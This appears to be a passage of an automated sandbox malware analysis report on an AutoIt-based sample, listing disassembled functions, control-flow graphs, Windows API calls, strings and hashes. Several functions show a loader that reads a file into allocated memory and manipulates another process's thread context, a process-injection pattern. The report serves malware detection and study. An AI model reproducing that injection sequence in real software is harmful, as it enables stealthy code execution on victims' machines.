                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                    • Instruction ID: 1ed4f583484687dd6ec54dd0508a2fc96599742552a223528e666c62dc3c5a2d
                    • Opcode Fuzzy Hash: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                    • Instruction Fuzzy Hash: 78A13E71D1022DDACB04EBA0CC9ADEEB778BF14341F444529E916B7191EFB96A0DCB60
                    Function 036C25F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 953 36c25f0-36c269e call 36c0000 956 36c26a5-36c26cb call 36c3500 CreateFileW 953->956 959 36c26cd 956->959 960 36c26d2-36c26e2 956->960 961 36c281d-36c2821 959->961 967 36c26e9-36c2703 VirtualAlloc 960->967 968 36c26e4 960->968 963 36c2863-36c2866 961->963 964 36c2823-36c2827 961->964 969 36c2869-36c2870 963->969 965 36c2829-36c282c 964->965 966 36c2833-36c2837 964->966 965->966 970 36c2839-36c2843 966->970 971 36c2847-36c284b 966->971 972 36c270a-36c2721 ReadFile 967->972 973 36c2705 967->973 968->961 974 36c28c5-36c28da 969->974 975 36c2872-36c287d 969->975 970->971 978 36c284d-36c2857 971->978 979 36c285b 971->979 980 36c2728-36c2768 VirtualAlloc 972->980 981 36c2723 972->981 973->961 976 36c28dc-36c28e7 VirtualFree 974->976 977 36c28ea-36c28f2 974->977 982 36c287f 975->982 983 36c2881-36c288d 975->983 976->977 978->979 979->963 984 36c276f-36c278a call 36c3750 980->984 985 36c276a 980->985 981->961 982->974 986 36c288f-36c289f 983->986 987 36c28a1-36c28ad 983->987 993 36c2795-36c279f 984->993 985->961 988 36c28c3 986->988 989 36c28af-36c28b8 987->989 990 36c28ba-36c28c0 987->990 988->969 989->988 990->988 994 36c27a1-36c27d0 call 36c3750 993->994 995 36c27d2-36c27e6 call 36c3560 993->995 994->993 1001 36c27e8 995->1001 1002 36c27ea-36c27ee 995->1002 1001->961 1003 36c27fa-36c27fe 1002->1003 1004 36c27f0-36c27f4 FindCloseChangeNotification 1002->1004 1005 36c280e-36c2817 1003->1005 1006 36c2800-36c280b VirtualFree 1003->1006 1004->1003 1005->956 1005->961 1006->1005
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036C26C1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036C28E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: a2329f80c3a695f2727f81d7af7720e81c945896d5af418f34ca61a0e17677c6
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: C0A11674E11248EBDF14CBA4C9A8BAEB7B5FF48704F20855DE501BB280C7759A85CFA4
                    Function 007539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1074 7539e7-753a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00753A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                    • Instruction ID: 7d533b84a6f6290bf85d85d2401eb5124ac854660e556e1b783989b08593f151
                    • Opcode Fuzzy Hash: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                    • Instruction Fuzzy Hash: D5F03A706012907EEA3017236C08FA72F7DEBC6F60B01802AF900E2270D2B91821CAB0
                    Function 036C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1075 36c23b0-36c24eb call 36c0000 call 36c22a0 CreateFileW 1082 36c24ed 1075->1082 1083 36c24f2-36c2502 1075->1083 1084 36c25a2-36c25a7 1082->1084 1086 36c2509-36c2523 VirtualAlloc 1083->1086 1087 36c2504 1083->1087 1088 36c2525 1086->1088 1089 36c2527-36c253e ReadFile 1086->1089 1087->1084 1088->1084 1090 36c2540 1089->1090 1091 36c2542-36c257c call 36c22e0 call 36c12a0 1089->1091 1090->1084 1096 36c257e-36c2593 call 36c2330 1091->1096 1097 36c2598-36c25a0 ExitProcess 1091->1097 1096->1097 1097->1084
                    APIs
                      • Part of subcall function 036C22A0: Sleep.KERNELBASE(000001F4), ref: 036C22B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036C24E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: 8R8SHE08XIMXV7ADOFLI
                    • API String ID: 2694422964-732184129
                    • Opcode ID: f285965c183fbfde3d2339b00fd4117e1bb8d2def8b125b2a121dfbedf1336cc
                    • Instruction ID: 2e94428622c3c58ef047c6e958f3f5893e29935a666b5087a2de97e04dcb4e86
                    • Opcode Fuzzy Hash: f285965c183fbfde3d2339b00fd4117e1bb8d2def8b125b2a121dfbedf1336cc
                    • Instruction Fuzzy Hash: F8518F70D14288EAEF11DBA4C825BEFBB79AF15300F00459DE609BB2C1D6790B45CBA5
                    Function 0075410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1099 75410d-754123 1100 754200-754204 1099->1100 1101 754129-75413e call 757b76 1099->1101 1104 754144-754164 call 757d2c 1101->1104 1105 78d5dd-78d5ec LoadStringW 1101->1105 1108 78d5f7-78d60f call 757c8e call 757143 1104->1108 1109 75416a-75416e 1104->1109 1105->1108 1119 75417e-7541fb call 773020 call 75463e call 772ffc Shell_NotifyIconW call 755a64 1108->1119 1120 78d615-78d633 call 757e0b call 757143 call 757e0b 1108->1120 1111 754205-75420e call 7581a7 1109->1111 1112 754174-754179 call 757c8e 1109->1112 1111->1119 1112->1119 1119->1100 1120->1119
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D5EC
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • _memset.LIBCMT ref: 0075418D
                    • _wcscpy.LIBCMT ref: 007541E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                    • Instruction ID: 10222e01a4b7993ba6ccb92c8497b136eaa1d56cb9eb5c63f38d7e609f8983ff
                    • Opcode Fuzzy Hash: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                    • Instruction Fuzzy Hash: 3631C1714083089AD725EB60EC4ABDB77ECBF44305F10851AF995920A1EBBC9A9CC796
                    Function 0077564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1134 77564d-775666 1135 775683 1134->1135 1136 775668-77566d 1134->1136 1137 775685-77568b 1135->1137 1136->1135 1138 77566f-775671 1136->1138 1139 775673-775678 call 778d68 1138->1139 1140 77568c-775691 1138->1140 1148 77567e call 778ff6 1139->1148 1142 775693-77569d 1140->1142 1143 77569f-7756a3 1140->1143 1142->1143 1145 7756c3-7756d2 1142->1145 1146 7756a5-7756b0 call 773020 1143->1146 1147 7756b3-7756b5 1143->1147 1151 7756d4-7756d7 1145->1151 1152 7756d9 1145->1152 1146->1147 1147->1139 1150 7756b7-7756c1 1147->1150 1148->1135 1150->1139 1150->1145 1153 7756de-7756e3 1151->1153 1152->1153 1156 7757cc-7757cf 1153->1156 1157 7756e9-7756f0 1153->1157 1156->1137 1158 7756f2-7756fa 1157->1158 1159 775731-775733 1157->1159 1158->1159 1160 7756fc 1158->1160 1161 775735-775737 1159->1161 1162 77579d-77579e call 780df7 1159->1162 1163 775702-775704 1160->1163 1164 7757fa 1160->1164 1165 77575b-775766 1161->1165 1166 775739-775741 1161->1166 1175 7757a3-7757a7 1162->1175 1170 775706-775708 1163->1170 1171 77570b-775710 1163->1171 1172 7757fe-775807 1164->1172 1168 77576a-77576d 1165->1168 1169 775768 1165->1169 1173 775743-77574f 1166->1173 1174 775751-775755 1166->1174 1177 7757d4-7757d8 1168->1177 1178 77576f-77577b call 774916 call 7810ab 1168->1178 1169->1168 1170->1171 1171->1177 1179 775716-77572f call 780f18 1171->1179 1172->1137 1176 775757-775759 1173->1176 1174->1176 1175->1172 1180 7757a9-7757ae 1175->1180 1176->1168 1182 7757ea-7757f5 call 778d68 1177->1182 1183 7757da-7757e7 call 773020 1177->1183 1195 775780-775785 1178->1195 1194 775792-77579b 1179->1194 1180->1177 1181 7757b0-7757c1 1180->1181 1186 7757c4-7757c6 1181->1186 1182->1148 1183->1182 1186->1156 1186->1157 1194->1186 1196 77580c-775810 1195->1196 1197 77578b-77578e 1195->1197 1196->1172 1197->1164 1198 775790 1197->1198 1198->1194
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: f0476e0d1d8db384f5ec03ac899d67bba93a2be0b01370cfb3e3afbc7d5d5b12
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: D151B330B00B09DBDF289F79C88466E77A5AF407A0F64C729F82DD62D0D7B89D518B90
                    Function 007569CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00754F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                    • _free.LIBCMT ref: 0078E68C
                    • _free.LIBCMT ref: 0078E6D3
                      • Part of subcall function 00756BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: a72a37f2f7ffa8403c8ea8be490563790fa6cc4978a07b85bdd61ce31b9cc30b
                    • Instruction ID: 539f0abec368e4b76dc02074a3398c7bb3077f6824d03b0a05cbb832e727b03e
                    • Opcode Fuzzy Hash: a72a37f2f7ffa8403c8ea8be490563790fa6cc4978a07b85bdd61ce31b9cc30b
                    • Instruction Fuzzy Hash: F0918071A10219EFCF04EFA4CC959EDB7B4FF15314F14446AF815AB291EB78A905CB60
                    Function 0075F8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                      • Part of subcall function 00766259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075FA90), ref: 007662B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075FB2D
                    • OleInitialize.OLE32(00000000), ref: 0075FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 007949F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: %~
                    • API String ID: 1986988660-3145668672
                    • Opcode ID: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                    • Instruction ID: 3bc38c4299a827862249cd09fe03372ef9a6c97d90c8db34e13af8822d53189a
                    • Opcode Fuzzy Hash: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                    • Instruction Fuzzy Hash: 8081C8B0902240CEC784DF69A8496D57BEDFF88318310C67AD49AC73A2FB794468CF58
                    Function 007535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                    • Instruction ID: 133d447f1ac2657b5012535708b880ca1f613b3c0b8a83b51fecbc0a5784075f
                    • Opcode Fuzzy Hash: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                    • Instruction Fuzzy Hash: D5115A71511208BFDB208F64DC40EEEB7B8EF04781F00846AF805D7220E2B69F5497A4
                    Function 036C12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 036C1A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036C1AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036C1B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction ID: 2f6a084abea824f2d89b29ac5c8bb8ff6b409a525a0b787430980a82baefd012
                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction Fuzzy Hash: 23620B30A14258DBEB24CBA4C850BEEB376EF59300F1091A9D10DEB391E7759E81CB59
                    Function 007B97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                    • _free.LIBCMT ref: 007B992C
                    • _free.LIBCMT ref: 007B9933
                    • _free.LIBCMT ref: 007B999E
                      • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                      • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                    • _free.LIBCMT ref: 007B99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: 796aeca3e29dba7aa5884e4efe00fd3cac3c3a9dbf4f2725bd40ae4078f0b151
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 7A515DB1904258EFDF249F64CC45ADEBBB9EF48300F1044AEF659A7281DB755A80CF58
                    Function 0077493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 4bc78bf27f2afb397134274d7043d027d0c0b093fb8a1b4db6a4d5dc839b2eb8
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: BE41C571740705ABDF288E69C88496F77A9EF803E0B24C57DE95D87640E778ED408B44
                    Function 00754DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/~$EA06
                    • API String ID: 4104443479-1801474073
                    • Opcode ID: a722df41a78d59a34fbc9f33b72cd65a06b69ee088061b57beb1f2be74be465f
                    • Instruction ID: 66ca4c0ec9a4611e91b6af490d41243356a733192373cb7dea6974bb61f5525b
                    • Opcode Fuzzy Hash: a722df41a78d59a34fbc9f33b72cd65a06b69ee088061b57beb1f2be74be465f
                    • Instruction Fuzzy Hash: 90416C32A041949BDF215B64CC677FE7FA5AF0130AF584065EC869A2C2C5ED8DCC83A1
                    Function 007573E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0078EE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 0078EEAC
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                      • Part of subcall function 007709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                    • Instruction ID: 7c14bfb19ffaf51933c340d614a8bc29c9d7ecf3d7dcedc22496a928f7014505
                    • Opcode Fuzzy Hash: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                    • Instruction Fuzzy Hash: FB219271A002989BDB459B94D849BEE7BF8AF49315F00801AE948E7281DBF8598DCB91
                    Function 007B901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
